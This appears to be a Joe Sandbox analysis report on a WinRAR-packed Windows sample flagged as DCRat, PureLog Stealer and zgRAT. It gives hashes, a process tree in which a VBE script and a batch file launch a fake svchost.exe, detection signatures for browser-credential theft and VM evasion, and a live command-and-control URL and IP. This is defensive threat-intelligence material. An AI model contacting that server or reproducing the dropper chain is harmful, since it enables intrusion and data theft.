Edit tour

Windows Analysis Report
ugRGgCJhQl.exe

Overview

General Information

Sample name:	ugRGgCJhQl.exe renamed because original name is a hash value
Original sample name:	92949DD923E8E88C697092B5311C7D95.exe
Analysis ID:	1500382
MD5:	92949dd923e8e88c697092b5311c7d95
SHA1:	cb61d5772f5e07467734af1c151e831ff225ea17
SHA256:	b7d005d2dee9456e5fbdb5f7d46a7275a9c7000ec6cbf982eee58897f88fa4c8
Tags:	DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ugRGgCJhQl.exe (PID: 3876 cmdline: "C:\Users\user\Desktop\ugRGgCJhQl.exe" MD5: 92949DD923E8E88C697092B5311C7D95)

wscript.exe (PID: 6208 cmdline: "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7164 cmdline: C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 4340 cmdline: "C:\comref/svchost.exe" MD5: 5FF0CC76B0A007E57397479E5FE854B6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ugRGgCJhQl.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
ugRGgCJhQl.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\comref\svchost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\comref\svchost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
0000000E.00000000.1292145325.0000000000232000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3783847798.0000000012AD3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000003.1235344386.00000000069A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1234987945.0000000006090000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: svchost.exe PID: 4340	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
14.0.svchost.exe.230000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
14.0.svchost.exe.230000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.ugRGgCJhQl.exe.60de6cb.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.ugRGgCJhQl.exe.60de6cb.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ugRGgCJhQl.exe, ProcessId: 3876, TargetFilename: C:\comref\svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\comref/svchost.exe", CommandLine: "C:\comref/svchost.exe", CommandLine|base64offset|contains: , Image: C:\comref\svchost.exe, NewProcessName: C:\comref\svchost.exe, OriginalFileName: C:\comref\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\comref/svchost.exe", ProcessId: 4340, ProcessName: svchost.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\comref/svchost.exe", CommandLine: "C:\comref/svchost.exe", CommandLine|base64offset|contains: , Image: C:\comref\svchost.exe, NewProcessName: C:\comref\svchost.exe, OriginalFileName: C:\comref\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7164, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\comref/svchost.exe", ProcessId: 4340, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\ugRGgCJhQl.exe", ParentImage: C:\Users\user\Desktop\ugRGgCJhQl.exe, ParentProcessId: 3876, ParentProcessName: ugRGgCJhQl.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" , ProcessId: 6208, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.7 - Destination IP: 185.106.93.197

Timestamp:	2024-08-28T11:17:17.112230+0200
SID:	2048095
Severity:	1
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ugRGgCJhQl.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\eVuUdNSS.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\ThQetCXk.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\comref\POAHIjOuJ41OH.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\comref\svchost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Multi AV Scanner detection for dropped file

Source: C:\Users\user\Desktop\ApTjSBhc.log	Virustotal: Detection: 14%	Perma Link
Source: C:\Users\user\Desktop\LMrHnriI.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\LMrHnriI.log	Virustotal: Detection: 28%	Perma Link
Source: C:\Users\user\Desktop\ThQetCXk.log	Virustotal: Detection: 21%	Perma Link
Source: C:\Users\user\Desktop\eVuUdNSS.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\eVuUdNSS.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\jIMTFKhG.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\jIMTFKhG.log	Virustotal: Detection: 27%	Perma Link
Source: C:\comref\svchost.exe	ReversingLabs: Detection: 71%
Source: C:\comref\svchost.exe	Virustotal: Detection: 74%	Perma Link

Multi AV Scanner detection for submitted file

Source: ugRGgCJhQl.exe	Virustotal: Detection: 56%			Perma Link
Source: ugRGgCJhQl.exe	ReversingLabs: Detection: 79%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\eVuUdNSS.log	Joe Sandbox ML: detected
Source: C:\comref\svchost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ugRGgCJhQl.exe

Joe Sandbox ML: detected

Source: ugRGgCJhQl.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ugRGgCJhQl.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: iC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: rC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: pC:/Users/user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: qC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000044FA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006A94000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006628000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.000000000628D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ugRGgCJhQl.exe
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006876000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000005AAB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: zC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.00000000052B6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: {C:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000004CB9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006665000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000E.00000002.3698250628.0000000006455000.00000004.00000800.00020000.00000000.sdmp
